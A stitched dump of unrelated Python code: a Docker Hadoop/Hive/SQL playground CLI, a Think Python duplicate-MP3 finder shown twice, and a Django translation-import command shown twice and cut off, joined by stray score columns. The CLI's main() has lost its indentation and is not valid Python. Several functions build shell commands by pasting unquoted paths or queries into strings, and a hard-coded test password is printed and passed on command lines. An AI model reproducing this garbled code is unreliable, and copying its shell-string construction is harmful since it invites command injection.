    # ['bash', '-c', 'exit', '0']; bash takes '0' as $0 and runs 'exit', which
    # still exits 0 when the container is up — confirm this probe is intended.
    return_code = exec_docker(config, node_name, 'bash -c exit 0', check=False)
    if return_code == 0:
        return NodeHealthReport(is_healthy=True, message='\u2705 Node running')
    else:
        return NodeHealthReport(is_healthy=False, message='\u274C Node not running')
def gen_health_summary(config):
    """
    Generates a health report summary on the running cluster.

    Polls every node's jmx endpoint (or docker, for nodes without metrics)
    and aggregates the per-node reports into one HealthReportSummary.
    """
    nn1 = gen_node_health_report(metric_request(PORT_UI_NN1), json_checker_namenode)
    dn1 = gen_node_health_report(metric_request(PORT_UI_DN1), json_checker_datanode)
    rman = gen_node_health_report(metric_request(PORT_UI_RMAN), json_checker_resourcemanager)
    nm1 = gen_node_health_report(metric_request(PORT_UI_NM1), json_checker_response_only)
    mrhist = gen_node_health_report(metric_request(PORT_UI_MRHIST), json_checker_response_only)
    hs = gen_node_health_report(metric_request(PORT_UI_HS), json_checker_response_only)
    client = gen_docker_health_report(config, 'client')
    sql = gen_docker_health_report(config, 'sql')
    reports = (nn1, dn1, rman, nm1, mrhist, hs, client, sql)
    return HealthReportSummary(
        cluster_healthy=all(r.is_healthy for r in reports),
        nn1=nn1,
        dn1=dn1,
        rman=rman,
        nm1=nm1,
        mrhist=mrhist,
        hs=hs,
        client=client,
        sql=sql)
def print_node_health(report):
    """
    Prints a node health report.

    :param report: a NodeHealthReport-like object, or None for a node whose
        report is not implemented.
    """
    if report is None:
        print('? Report not implemented.')
        print()
        return
    status = '\u2705 Healthy' if report.is_healthy else '\u274C Unhealthy'
    print('Overall Status:')
    print(status)
    print('Checklist:')
    print(report.message)
    print()
def print_summary(summary):
    """
    Prints a summary health report, one titled section per node, followed by
    the overall cluster verdict.
    """
    sections = [
        ('NAME NODE 1', summary.nn1),
        ('DATA NODE 1', summary.dn1),
        ('RESOURCE MANAGER', summary.rman),
        ('NODE MANAGER 1', summary.nm1),
        ('MAP REDUCE HISTORY SERVER', summary.mrhist),
        ('HIVE SERVER', summary.hs),
        ('CLIENT NODE', summary.client),
        ('SQL SERVER', summary.sql),
    ]
    for title, report in sections:
        print(title)
        print_node_health(report)
    print('OVERALL CLUSTER HEALTH')
    print('\u2705 Healthy' if summary.cluster_healthy else '\u274C Unhealthy')
def print_health(config):
    """
    Prints the health of the cluster.
    """
    print('Checking cluster health.')
    print()
    summary = gen_health_summary(config)
    print_summary(summary)


def wait_for_healthy_nodes_print(config, timeout):
    """
    Blocks until all nodes are healthy or until timeout, and prints the results.

    :param timeout: maximum number of seconds to wait.
    """
    _start = time.time()
    summary = wait_for_healthy_nodes(config, timeout=timeout)
    print('Wait completed in %fs. Summary:' % (time.time() - _start))
    print()
    print_summary(summary)
def get_summary_preview_str(summary):
    """
    Gets a oneliner string displaying the summarized cluster health.

    Each node is shown as a check mark or a cross followed by its short name.
    """
    nodes = [
        ('nn1', summary.nn1),
        ('dn1', summary.dn1),
        ('rman', summary.rman),
        ('nm1', summary.nm1),
        ('mrhist', summary.mrhist),
        ('hs', summary.hs),
        ('client', summary.client),
        ('sql', summary.sql),
    ]
    parts = []
    for short_name, report in nodes:
        mark = '\u2705' if report.is_healthy else '\u274C'
        parts.append('%s %s' % (mark, short_name))
    return ', '.join(parts)
def wait_for_healthy_nodes(config, timeout=200, interval=5):
    """
    Blocks until all nodes are healthy or until timeout.

    :param config: playground Config for docker access.
    :param timeout: maximum number of seconds to wait.
    :param interval: seconds between health polls.
    :returns: the last HealthReportSummary generated, healthy or not.
    """
    # BUG FIX: when timeout < interval the original computed range(0) and
    # returned None without ever polling, crashing callers that read summary
    # attributes. Always poll at least once.
    attempts = max(1, int(timeout / interval))
    _summary = None
    for _t in range(attempts):
        _summary = gen_health_summary(config)
        if _summary.cluster_healthy:
            return _summary
        print('...Waiting... ' + get_summary_preview_str(_summary))
        time.sleep(interval)
    return _summary
def setup(config):
    """
    One-time setup for the cluster.

    Destroys previous volumes, formats HDFS, initializes Hive, ingests the
    configured data, copies sources, then spins the cluster back down.
    """
    print('Destroying volumes.')
    destroy_volumes(config)
    print('Spinning cluster up.')
    cluster_up(config)
    print('Formatting HDFS.')
    format_hdfs(config)
    print('Starting Hadoop Daemons.')
    start_hadoop_daemons(config)
    print('Setting up Hive server.')
    setup_hive(config)
    print('Ingesting configured data volume into HDFS (this could take some time).')
    ingest_data(config)
    print('Copying configured source folder to the client node volume.')
    copy_source(config)
    print('Spinning cluster down.')
    cluster_down(config)


def print_port_doc():
    """
    Prints documentation on the exposed ports.
    """
    print('Exposed ports on localhost:')
    # PORT_DOC entries appear to be (port, type, description) triples.
    for _p in PORT_DOC:
        print('Port: %s, Type: %s, Description: %s' % \
            (_p[0], _p[1], _p[2]))


def start(config, wait=True):
    """
    Boots up the cluster and starts all of the daemons on the cluster.

    :param wait: when True, blocks until all nodes report healthy (or timeout).
    """
    print('Spinning cluster up.')
    cluster_up(config)
    print('Starting Hadoop Daemons.')
    start_hadoop_daemons(config)
    print('Starting Hive Server.')
    start_hive_server(config)
    if wait:
        print('Starting wait routine.')
        wait_for_healthy_nodes_print(config, 200)
    print_port_doc()


def stop(config):
    """
    Spins down the cluster.
    """
    print('Spinning cluster down.')
    cluster_down(config)


def destroy_volumes(config):
    """
    Removes the persistant file storage of the cluster.
    """
    # Bring the cluster down first so no container is writing to the volumes.
    print('Spinning cluster down.')
    cluster_down(config)
    if not os.path.exists(config.volumes_dir):
        print('Volumes directory does not exist. Cannot delete.')
    else:
        print('Deleting files.')
        shutil.rmtree(config.volumes_dir)
def print_hadoop_node_logs(config, node_name):
    """
    Prints the logs of the given hadoop node.

    :param node_name: docker-compose service name of the hadoop node.
    """
    # BUG FIX: the '%s' placeholder was never filled in (no % arguments), so
    # the literal string 'cat %s/logs/*.log' was executed. Fill in HADOOP_HOME
    # and run through bash -c so the *.log glob is expanded — plain
    # `docker exec` does not perform shell globbing.
    exec_docker(config, node_name, 'bash -c "cat %s/logs/*.log"' % (HADOOP_HOME))
def beeline_cli(config):
    """
    Launches an interactive cli on the client node with beeline cli.
    """
    exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000' % (HIVE_HOME), \
        workdir='/src', interactive=True)


def bash_cli(config, nodename):
    """
    Launches an interactive bash shell on the given node.
    """
    exec_docker(config, nodename, 'bash', interactive=True)


def sqlcmd_cli(config, local):
    """
    Launches an interactive sql cli on the client node or local host if specified.

    :param local: when truthy, runs sqlcmd on the host instead of the client node
        (requires sqlcmd on the host PATH).
    """
    if local:
        os.system('sqlcmd -S tcp:localhost,%d -U sa -P %s' % (PORT_SQL_SQL, SQL_TEST_PASSWORD))
    else:
        exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s' % \
            (SQL_TEST_PASSWORD), workdir='/src', interactive=True)


def sql_exec_query(config, query, database_name='master'):
    """
    Executes an sql query from the client node.
    """
    exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql' \
        ' -U sa -d %s -P %s -q "%s"' % \
        (database_name, SQL_TEST_PASSWORD, query), workdir='/src')


def sql_exec_file(config, filename):
    """
    Executes an sql file from the source directory on the client node.
    """
    exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s -i "%s"' % \
        (SQL_TEST_PASSWORD, filename), workdir='/src')


def sqoop_export(config, export_dir, sql_table, database_name='master', delimiter=','):
    """
    Exports HDFS text delimited files to the sql node.

    :param export_dir: HDFS directory containing the delimited files.
    :param sql_table: destination table; must already exist with a matching schema.
    :param delimiter: field terminator used in the HDFS files.
    """
    exec_docker(config, 'client', '%s/bin/sqoop export --connect' \
        ' "jdbc:sqlserver://sql;databaseName=%s"' \
        ' --username "sa" --password "%s" --export-dir "%s" --table "%s"' \
        ' --input-fields-terminated-by "%s"' % \
        (SQOOP_HOME, database_name, SQL_TEST_PASSWORD, export_dir, sql_table, delimiter), \
        workdir='/src')


def launch_ssms_win_local(executable_path):
    """
    Launches Sql Server Management Studio locally.

    Windows only; prints an explanatory message on other platforms.
    """
    if os.name == 'nt':
        if os.path.exists(executable_path):
            print('Note: Connection will only succeed if "Remember Password" has been checked in ' \
                'the SSMS login previously.')
            print('Use test password: %s' % (SQL_TEST_PASSWORD))
            os.system('"%s" -S tcp:localhost,%d -U sa' % (executable_path, PORT_SQL_SQL))
        else:
            print('The executable path for ssms does not exist. Please provide the correct one with' \
                ' arg "-f".' \
            )
    else:
        print('This command is not implemented for non-Windows platforms.')


def exec_hive_file(config, src_file):
    """
    Executes a hive script file from the source directory on the client node.
    """
    exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000 -f %s' % \
        (HIVE_HOME, src_file), workdir='/src')


def exec_hive_query(config, query):
    """
    Executes a hive query from the client node.
    """
    exec_docker(config, 'client', '%s/bin/beeline -u jdbc:hive2://hs:10000 -e "%s"' % \
        (HIVE_HOME, query), workdir='/src')
def input_with_validator(prompt, failure_msg, validator_func):
    """
    Prompts for interactive user input until the validator accepts it.

    :param prompt: text shown before each read.
    :param failure_msg: message printed after each rejected input.
    :param validator_func: callable returning a truthy value for valid input.
    :returns: the first accepted input string.
    """
    while True:
        answer = input(prompt)
        if validator_func(answer):
            return answer
        print(failure_msg)
def validate_project_name(val):
    """
    Input validator function for project name configuration.

    Accepts only non-empty, purely alphanumeric names (no spaces,
    underscores, or other punctuation).
    """
    # Simplification: str.isalnum() already rejects every character the old
    # r'\W' regex matched, plus underscores and the empty string, so the
    # regex check was redundant.
    return val.isalnum()
def validate_directory(val):
    """
    Input validator function for a directory name.

    :returns: True when the path exists on disk.
    """
    return os.path.exists(val)


def validate_parent_directory(val):
    """
    Input validator function for a directory name where only the parent directory needs to exist.
    """
    # The directory itself may be created later (e.g. the volumes dir).
    return os.path.exists(os.path.dirname(val))
def validate_yn(val):
    """
    Input validator function for yes/no prompts (case-insensitive).
    """
    return val.lower() in ('y', 'n')
def set_environment(config):
    """
    Sets the environment variables for consumption by docker-compose.

    NOTE(review): assumes all four config values are non-None — os.environ
    assignment raises TypeError on None; confirm callers guarantee this.
    """
    os.environ['project_name'] = config.project_name
    os.environ['source_dir'] = config.source_dir
    os.environ['data_dir'] = config.data_dir
    os.environ['volumes_dir'] = config.volumes_dir
    # BUG FIX: the original line contained the bare placeholder '<PASSWORD>',
    # which is a syntax error. The rest of the file reads the password from
    # the SQL_TEST_PASSWORD constant, so export that value here too.
    os.environ['sql_test_password'] = SQL_TEST_PASSWORD
def configure(args):
    """
    Returns config using a file, arguments, or interactive input.

    Precedence: when any of the four config values is missing from the
    arguments, the config file supplies the base values (created
    interactively if absent) and the supplied arguments override individual
    fields. When all four are given as arguments, no file is consulted.
    """
    _f = args.config_file
    config = None
    if get_config_file_needed(args):
        if not os.path.exists(_f):
            _o = input_with_validator('Config file "%s" does not exist. Would you like to create one' \
                ' interactively? (y/n): ' % _f, 'Please input "y" or "n".', validate_yn)
            if _o.lower() == 'y':
                config = configure_interactively()
                config.save(_f)
                print('Config saved.')
            else:
                print('Program needs configuration. Exiting.')
                sys.exit(1)
                # NOTE(review): unreachable — sys.exit() raises SystemExit above.
                return
        else:
            config = Config.load(_f)
            print('Config read.')
        # Command-line overrides take precedence over file values.
        if args.project_name:
            config.project_name = args.project_name
        if args.source_dir:
            config.source_dir = args.source_dir
        if args.data_dir:
            config.data_dir = args.data_dir
        if args.volumes_dir:
            config.volumes_dir = args.volumes_dir
    else:
        config = Config(args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
    return config


def configure_interactively():
    """
    Creates a config from interactive input.

    Each prompt re-asks until its validator accepts the value.
    """
    proj_name = input_with_validator( \
        'Please input your project name: ', \
        'No spaces or non-alphanumeric characters allowed.', \
        validate_project_name \
    )
    src_dir = input_with_validator( \
        'Please input your playground src directory: ', \
        'Please use a valid directory name that exists.', \
        validate_directory \
    )
    data_dir = input_with_validator( \
        'Please input your data directory: ', \
        'Please use a valid directory name that exists.', \
        validate_directory \
    )
    vol_dir = input_with_validator( \
        'Please input your volumes directory: ', \
        'Please use a valid parent directory name that exists.', \
        validate_parent_directory \
    )
    config = Config(proj_name, src_dir, data_dir, vol_dir)
    return config
# Thin CLI adapters: each *_cmd unpacks the parsed argparse namespace and
# delegates to the correspondingly named function above. `args` is unused in
# the adapters that take no extra options.
def build_img_cmd(config, args):
    """
    Command line function. See build_img() for documentation.
    """
    build_img(config)


def format_hdfs_cmd(config, args):
    """
    Command line function. See format_hdfs() for documentation.
    """
    format_hdfs(config)


def ingest_data_cmd(config, args):
    """
    Command line function. See ingest_data() for documentation.
    """
    ingest_data(config)


def copy_source_cmd(config, args):
    """
    Command line function. See copy_source() for documentation.
    """
    copy_source(config)


def setup_hive_cmd(config, args):
    """
    Command line function. See setup_hive() for documentation.
    """
    setup_hive(config)


def cluster_up_cmd(config, args):
    """
    Command line function. See cluster_up() for documentation.
    """
    cluster_up(config)


def start_hadoop_daemons_cmd(config, args):
    """
    Command line function. See start_hadoop_daemons() for documentation.
    """
    start_hadoop_daemons(config)


def start_hive_server_cmd(config, args):
    """
    Command line function. See start_hive_server() for documentation.
    """
    start_hive_server(config)


def cluster_down_cmd(config, args):
    """
    Command line function. See cluster_down() for documentation.
    """
    cluster_down(config)


def setup_cmd(config, args):
    """
    Command line function. See setup() for documentation.

    Asks for confirmation before deleting the volumes dir unless
    --skip-confirm was given.
    """
    if args.skip_confirm:
        setup(config)
        return
    result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
        ' files? y/n: ' % (config.volumes_dir), \
        'Please use "y" or "n".', \
        validate_yn \
    ).lower()
    if result == 'y':
        setup(config)
    else:
        print('Cancelling.')


def start_cmd(config, args):
    """
    Command line function. See start() for documentation.
    """
    start(config, wait=not args.no_wait)


def stop_cmd(config, args):
    """
    Command line function. See stop() for documentation.
    """
    stop(config)


def destroy_volumes_cmd(config, args):
    """
    Command line function. See destroy_volumes() for documentation.

    Asks for confirmation before deleting unless --skip-confirm was given.
    """
    if args.skip_confirm:
        destroy_volumes(config)
        return
    result = input_with_validator('Are you sure you want to delete directory "%s" and all of its' \
        ' files? y/n: ' % (config.volumes_dir), \
        'Please use "y" or "n".', \
        validate_yn \
    ).lower()
    if result == 'y':
        destroy_volumes(config)
    else:
        print('Cancelling.')


def print_hadoop_node_logs_cmd(config, args):
    """
    Command line function. See print_hadoop_node_logs() for documentation.
    """
    print_hadoop_node_logs(config, args.node)


def beeline_cli_cmd(config, args):
    """
    Command line function. See beeline_cli() for documentation.
    """
    beeline_cli(config)


def bash_cli_cmd(config, args):
    """
    Command line function. See bash_cli() for documentation.
    """
    bash_cli(config, args.node)


def sqlcmd_cli_cmd(config, args):
    """
    Command line function. See sqlcmd_cli() for documentation.
    """
    sqlcmd_cli(config, args.local)


def sql_exec_query_cmd(config, args):
    """
    Command line function. See sql_exec_query() for documentation.
    """
    sql_exec_query(config, args.query, args.database)


def sql_exec_file_cmd(config, args):
    """
    Command line function. See sql_exec_file() for documentation.
    """
    sql_exec_file(config, args.filename)


def sqoop_export_cmd(config, args):
    """
    Command line function. See sqoop_export() for documentation.
    """
    sqoop_export(config, args.export_dir, args.sql_table, args.database_name, args.delimiter)
def local_sql_info_cmd(config, args):
    """
    Command line function. Prints out non-secured sql server connection info.
    """
    print('SERVER NAME: tcp:localhost,%d' % (PORT_SQL_SQL))
    # Typo fix in the user-facing text: 'AUthentication' -> 'Authentication'.
    print('AUTHENTICATION: SQL Server Authentication')
    print('LOGIN: sa')
    print('PASSWORD: %s' % (SQL_TEST_PASSWORD))
# Remaining thin CLI adapters; see the functions they delegate to.
def launch_ssms_win_local_cmd(config, args):
    """
    Command line function. See launch_ssms_win_local() for documentation.
    """
    launch_ssms_win_local(args.executable_path)


def exec_hive_file_cmd(config, args):
    """
    Command line function. See exec_hive_file() for documentation.
    """
    exec_hive_file(config, args.src_path)


def exec_hive_query_cmd(config, args):
    """
    Command line function. See exec_hive_query() for documentation.
    """
    exec_hive_query(config, args.query)


def print_health_cmd(config, args):
    """
    Command line function. See print_health() for documentation.
    """
    print_health(config)


def wait_for_healthy_nodes_cmd(config, args):
    """
    Command line function. See wait_for_healthy_nodes_print() for documentation.
    """
    wait_for_healthy_nodes_print(config, args.timeout)
def get_config_file_needed(args):
    """
    Determines whether or not we need to fetch additional config variables from a file.

    :returns: True when any of the four config overrides is missing/falsy.
    """
    overrides = (args.project_name, args.source_dir, args.data_dir, args.volumes_dir)
    return not all(overrides)
def main():
"""
Main entry point for the program
"""
parser = argparse.ArgumentParser(prog='playground', description='HDFS, Hive, and SQL Playground')
parser.set_defaults(func=None)
# config-file
parser.add_argument('--config-file', '-c', default='config.json', help='The filename' \
' of the configuration file.')
# config-overrides
config_group = parser.add_argument_group('config-overrides', description='Overrides' \
' the configuration variables.')
config_group.add_argument('--project-name', '-p')
config_group.add_argument('--source-dir', '-s')
config_group.add_argument('--data-dir', '-d')
config_group.add_argument('--volumes-dir', '-v')
config_group.set_defaults(project_name=None, source_dir=None, data_dir=None, volumes_dir=None)
subparsers = parser.add_subparsers()
# build-img
subparsers.add_parser('build-img', help='Builds or rebuilds the required Docker images. Do this' \
' when you change the Dockerfile or anything in ./bin/.').set_defaults(func=build_img_cmd)
# format-hdfs
subparsers.add_parser('format-hdfs', help='Formats the entire distributed file system of the' \
' running cluster.').set_defaults(func=format_hdfs_cmd)
# ingest-data
subparsers.add_parser('ingest-data', help='Copies the mounted data volume to HDFS at /data on' \
' the running cluster.').set_defaults(func=ingest_data_cmd)
# copy-source
subparsers.add_parser('copy-source', help='Copies the configured source folder to the mounted' \
' client node volume.').set_defaults(func=copy_source_cmd)
# setup-hive
subparsers.add_parser('setup-hive', help='Creates the Hive schema metastore and makes' \
' necessary directories in HDFS. Cluster should be up and hadoop daemons should already' \
' be running.').set_defaults(func=setup_hive_cmd)
# cluster-up
subparsers.add_parser('cluster-up', help='Boots up all the nodes on the cluster but does not' \
' start any of their services.').set_defaults(func=cluster_up_cmd)
# start-hadoop
subparsers.add_parser('start-hadoop', help='Starts the name node and data node services for' \
' HDFS on a running cluster.').set_defaults(func=start_hadoop_daemons_cmd)
# start-hive
subparsers.add_parser('start-hive', help='Starts the hive server in the running cluster.') \
.set_defaults(func=start_hive_server_cmd)
# cluster-down
subparsers.add_parser('cluster-down', help='Shuts down all of the nodes.') \
.set_defaults(func=cluster_down_cmd)
# setup
setup_p = subparsers.add_parser('setup', help='Sets up the cluster for the first time.')
setup_p.add_argument('--skip-confirm', '-y', action='store_true', help='Skips any confirmation' \
' messages')
setup_p.set_defaults(func=setup_cmd, skip_confirm=False)
# start
start_p = subparsers.add_parser('start', help='Spins up the cluster and starts the daemons on ' \
'each node.')
start_p.add_argument('--no-wait', '-w', action='store_true', help='Exits immediately after ' \
'the cluster daemons have been told to start rather than blocking until the nodes are healthy.')
start_p.set_defaults(func=start_cmd, no_wait=False)
# stop
subparsers.add_parser('stop', help='Stops all of the services and shuts down all of the nodes.') \
.set_defaults(func=stop_cmd)
# destroy-vol
destroy_vol_p = subparsers.add_parser('destroy-vol', help='Removes all persisted cluster files.')
destroy_vol_p.add_argument('--skip-confirm', '-y', action='store_true')
destroy_vol_p.set_defaults(func=destroy_volumes_cmd, skip_confirm=False)
# print-hadoop-logs
print_hadoop_node_logs_p = subparsers.add_parser('print-hadoop-logs', help='Prints the log file' \
' of the specified hadoop node.')
print_hadoop_node_logs_p.add_argument('--node', '-n', help='The node to check the logs for.')
print_hadoop_node_logs_p.set_defaults(func=print_hadoop_node_logs_cmd)
# beeline-cli
subparsers.add_parser('beeline-cli', help='Launches a cli using beeline on the client node.') \
.set_defaults(func=beeline_cli_cmd)
# bash-cli
bash_cli_p = subparsers.add_parser('bash-cli', help='Launches bash cli on a single node in the' \
' cluster.')
bash_cli_p.add_argument('--node', '-n', help='The Docker service name of the node. Refer to the' \
' docker-compose.yml. Examples: "client", "nn1", "dn1", etc.')
bash_cli_p.set_defaults(func=bash_cli_cmd, node='client')
# sql-cli
sql_cli_p = subparsers.add_parser('sql-cli', help='Launches sqlcmd on the client' \
' node or locally.')
sql_cli_p.add_argument('--local', '-l', action='store_true', help='If specified, sqlcmd is' \
' launched on the host machine instead of the client node. Note: this requires sqlcmd to' \
' be on the environment PATH variable.')
sql_cli_p.set_defaults(func=sqlcmd_cli_cmd, local=False)
# sql-exec-query
sql_exec_query_p = subparsers.add_parser('sql-exec-query', help='Executes an SQL query.')
sql_exec_query_p.add_argument('--query', '-q', help='The sql query.')
sql_exec_query_p.add_argument('--database', '-d', help='The database to use.')
sql_exec_query_p.set_defaults(func=sql_exec_query_cmd, database='master')
# sql-exec-file
sql_exec_file_p = subparsers.add_parser('sql-exec-file', help='Executes an SQL file on the ' \
'client node.')
sql_exec_file_p.add_argument('--filename', '-f', help='The relative filename in the source dir.')
sql_exec_file_p.set_defaults(func=sql_exec_file_cmd)
# sqoop-export
sqoop_export_p = subparsers.add_parser('sqoop-export', help='Exports CSV files loaded in HDFS' \
' to the sql server node.')
#args.export_dir, args.sql_table, args.database_name, args.delimiter
sqoop_export_p.add_argument('--export-dir', '-e', help='The directory in HDFS which contains' \
' the CSV files.')
sqoop_export_p.add_argument('--sql-table', '-t', help='The name of the sql table to export to.' \
' Note: this table should already exist with the correct schema.')
sqoop_export_p.add_argument('--database-name', '-b', help='The name of the database to' \
' export to.')
sqoop_export_p.add_argument('--delimiter', '-d', help='The character used to for delimiting' \
' the values in the HDFS files.')
sqoop_export_p.set_defaults(func=sqoop_export_cmd, database_name='master', delimiter=',')
# local-sql-info
subparsers.add_parser('local-sql-info', help='Shows the connection information for connecting' \
' to the sql server from the parent host.').set_defaults(func=local_sql_info_cmd)
# launch-ssms
launch_ssms_p = subparsers.add_parser('launch-ssms', help='Note: Only works on Windows and' \
' requires installation of SQL Server Management Server. This command launches SQL Server' \
' Management Server using the local connection information.')
launch_ssms_p.add_argument('--executable-path', '-f')
launch_ssms_p.set_defaults(func=launch_ssms_win_local_cmd, executable_path= \
'C:\\Program Files (x86)\\Microsoft SQL Server Management Studio 18\\Common7\\IDE\\Ssms.exe')
# exec-hive-file
exec_hive_file_p = subparsers.add_parser('exec-hive-file', help='Executes a hive script from' \
' the src folder.')
exec_hive_file_p.add_argument('--src-path', '-f', help='The relative path to the file on the ' \
'linux node')
exec_hive_file_p.set_defaults(func=exec_hive_file_cmd)
# exec-hive-query
exec_hive_query_p = subparsers.add_parser('exec-hive-query', help='Executes a single' \
' hive query.')
exec_hive_query_p.add_argument('--query', '-e', help='The hive query string to execute.')
exec_hive_query_p.set_defaults(func=exec_hive_query_cmd)
# print-health
subparsers.add_parser('print-health', help='Prints the cluster health information.') \
.set_defaults(func=print_health_cmd)
# wait-for-healthy-nodes
wait_p = subparsers.add_parser('wait-for-healthy-nodes', help='Waits until the cluster is ' \
'healthy or until timeout.')
wait_p.add_argument('--timeout', '-t', help='The time in seconds until command timeout.')
wait_p.set_defaults(func=wait_for_healthy_nodes_cmd, timeout=200)
args = parser.parse_args()
if not args.func:
print('No subcommand selected. Use -h to get help.')
parser.print_usage()
return
config = configure(args)
args.func(config, args)
print('Program end.')
if __name__ == '__main__':
main() | 0.438545 | 0.101456 |
import os
def find_files_with_suffix(directory, suffix):
    """Recursively collect files under *directory* whose names end with *suffix*.

    Args:
        directory: Root directory to search (walked with os.walk).
        suffix: Filename suffix to match, e.g. '.mp3'.

    Returns:
        A list of paths, each joined with the subdirectory it was found in.
    """
    result = []
    # os.walk visits every subdirectory exactly once, so no manual recursion
    # is needed.  (Removed the unused `suffix_length` local from the original.)
    for root, _dirs, files in os.walk(directory):
        result.extend(
            os.path.join(root, name) for name in files if name.endswith(suffix)
        )
    return result
def pipe(command):
    """Execute *command* through the shell and return its captured stdout."""
    stream = os.popen(command)
    captured = stream.read()
    stream.close()
    return captured
def find_identical_checksums(directory, suffix):
    """Group files under *directory* (matching *suffix*) by identical MD5 digest.

    BUG FIX: the original shelled out via ``pipe('md5sum ' + file)``, which
    breaks on paths containing spaces or shell metacharacters and only works
    where the md5sum binary exists.  Hashing in-process with hashlib is
    portable and injection-safe, and produces the same hex digests.

    Args:
        directory: Root directory to search.
        suffix: Filename suffix to match, e.g. '.mp3'.

    Returns:
        A list of lists; each inner list holds two or more paths whose file
        contents share the same MD5 checksum.
    """
    import hashlib

    md5_dict = {}
    for path in find_files_with_suffix(directory, suffix):
        digest = hashlib.md5()
        # Read in chunks so large files do not need to fit in memory.
        with open(path, 'rb') as fp:
            for chunk in iter(lambda: fp.read(65536), b''):
                digest.update(chunk)
        md5_dict.setdefault(digest.hexdigest(), []).append(path)
    return [files for files in md5_dict.values() if len(files) > 1]
def find_duplicates(directory, suffix):
    """Report files under *directory* with suffix *suffix* that share an MD5 sum.

    For every pair of same-checksum files, runs ``diff`` to confirm whether
    the contents really are identical (a useful double check since MD5
    collisions are possible).

    BUG FIX: the original ignored both parameters and always scanned
    'test_mp3s' for '.mp3' files.
    """
    for files in find_identical_checksums(directory, suffix):
        for item1 in files:
            for item2 in files:
                # item1 < item2 visits each unordered pair exactly once.
                if item1 < item2:
                    print('These 2 files have the same md5 sum:\n', item1, item2)
                    diff = pipe('diff ' + item1 + ' ' + item2)
                    if diff == '':
                        print('and they have the same contents')
                    else:
                        print('but have different contents!')
find_duplicates('test_mp3s', '.mp3') | Chapter14/ex14-3.py | import os
def find_files_with_suffix(directory, suffix):
"""Takes 2 strings, directory and suffix
Searches the directory and all of its subdirectories and returns a
list of complete paths for all files with the given suffix"""
result = []
suffix_length = len(suffix)
for(root, dirs, files) in os.walk(directory):
for item in files:
if item.endswith(suffix):
result.append(os.path.join(root, item))
return result
def pipe(command):
"""Runs a unix command, returns result"""
fp = os.popen(command)
result = fp.read()
fp.close()
return result
def find_identical_checksums(directory, suffix):
"""Takes 2 strings, a directory path and a filename suffix
Returns a list of lists of filenames (with full path) that have
the same md5sum"""
result = []
md5_dict = dict()
t = find_files_with_suffix(directory, suffix)
for file in t:
res = pipe('md5sum ' + file)
md5sum = res.split(' ')[0]
if md5sum in md5_dict:
md5_dict[md5sum] += [file]
else:
md5_dict[md5sum] = [file]
for md5sum, files in md5_dict.items():
if len(files) > 1:
result.append(files)
return result
def find_duplicates(directory, suffix):
"""Recursively searches string 'directory' for files ending with string
'suffix'
Prints matching files with the same md5sum and whether the diff command
shows that they are identical"""
res = find_identical_checksums('test_mp3s', '.mp3')
for files in res:
for item1 in files:
for item2 in files:
if item1 < item2:
print('These 2 files have the same md5 sum:\n', item1, item2)
diff = pipe('diff '+ item1 + ' ' + item2)
if diff == '':
print('and they have the same contents')
else:
print('but have different contents!')
find_duplicates('test_mp3s', '.mp3') | 0.479991 | 0.330444 |
import argparse
import json
import re
from django.core.management.base import BaseCommand
from translations_tool.translations.models import (
Directory,
Translation,
TranslationGroup,
)
PATTERN = re.compile(r"[a-zA-Z]")
class Command(BaseCommand):
    # Destructive import: deletes ALL existing Translation, TranslationGroup
    # and Directory rows, then rebuilds them from the JSON dump given on the
    # command line.
    help = "Imports translation from json data"

    def add_arguments(self, parser):
        """Register the positional data-file argument (argparse opens it)."""
        parser.add_argument(
            "path",
            type=argparse.FileType("r"),
            help="Path to the data file",
        )

    def handle(self, *args, **options):
        """Load the JSON rows and recreate the translation tables from them."""
        file = options["path"]  # already an open file handle (FileType("r"))
        data = json.loads(file.read())
        print(len(data))
        # Full replacement: wipe everything before importing.
        Translation.objects.all().delete()
        TranslationGroup.objects.all().delete()
        Directory.objects.all().delete()
        count = len(data)
        for i, row in enumerate(data, start=1):
            key = (row["key"] or "").strip()
            key_from_value = False
            value = row["value_pl"].strip()
            value_as_key = value.upper()
            # PATTERN matches any ASCII letter; used as a "contains real text"
            # check for both the value and the key.
            nonempty_value = PATTERN.search(value_as_key)
            if not key and nonempty_value:
                # No explicit key: derive one from the Polish value itself.
                key = f"{value_as_key}_VALUE"
                key_from_value = True
            if not PATTERN.search(key) or not nonempty_value:
                # Skip rows with no usable key or an empty value.
                continue
            print(f"{i}/{count}")
            # Build (or reuse) the group chain for a dotted group path, e.g.
            # "app.menu.items" -> app -> menu -> items, linked via `parent`.
            prev_group = None
            for group_name in row["group"].split("."):
                assert group_name
                prev_group, created = TranslationGroup.objects.get_or_create(
                    name_en=group_name,
                    name_pl=group_name,
                    name_de=group_name,
                    name_ru=group_name,
                    parent=prev_group,
                )
            filepath = row["metadata"]["path"]
            if not filepath:
                continue
            creation_kwargs = {
                "key": key,
                "value_pl": value,
                "parent": prev_group,
                "file": filepath,
                "line": row["metadata"]["line"],
            }
            try:
                translation = Translation.objects.get(key=key)
                if not (key_from_value or translation.value_pl == value):
                    # Same key imported twice with a different value.
                    print("ALERT!!!", key, row)
                    # NOTE(review): bare `raise` here has no active exception,
                    # so it raises RuntimeError and the `continue` below is
                    # unreachable on this branch.  Presumably intended as a
                    # hard stop on conflicting data -- confirm.
                    raise
                continue
            except Translation.DoesNotExist:
                pass
            translation, _ = Translation.objects.get_or_create(**creation_kwargs)
            # Mirror the source file path as a Directory tree: one node per
            # path component, the final component flagged as a leaf (the file).
            parent = None
            path = ""
            *parts, last_part = filepath.strip("/").split("/")
            for part in parts:
                path += f"/{part}"
                parent, _ = Directory.objects.get_or_create(name=part, path=path, parent=parent)
            path += f"/{last_part}"
parent, _ = Directory.objects.get_or_create(name=last_part, path=path, parent=parent, leaf=True) | translations_tool/translations/management/commands/import_data.py | import argparse
import json
import re
from django.core.management.base import BaseCommand
from translations_tool.translations.models import (
Directory,
Translation,
TranslationGroup,
)
PATTERN = re.compile(r"[a-zA-Z]")
class Command(BaseCommand):
help = "Imports translation from json data"
def add_arguments(self, parser):
parser.add_argument(
"path",
type=argparse.FileType("r"),
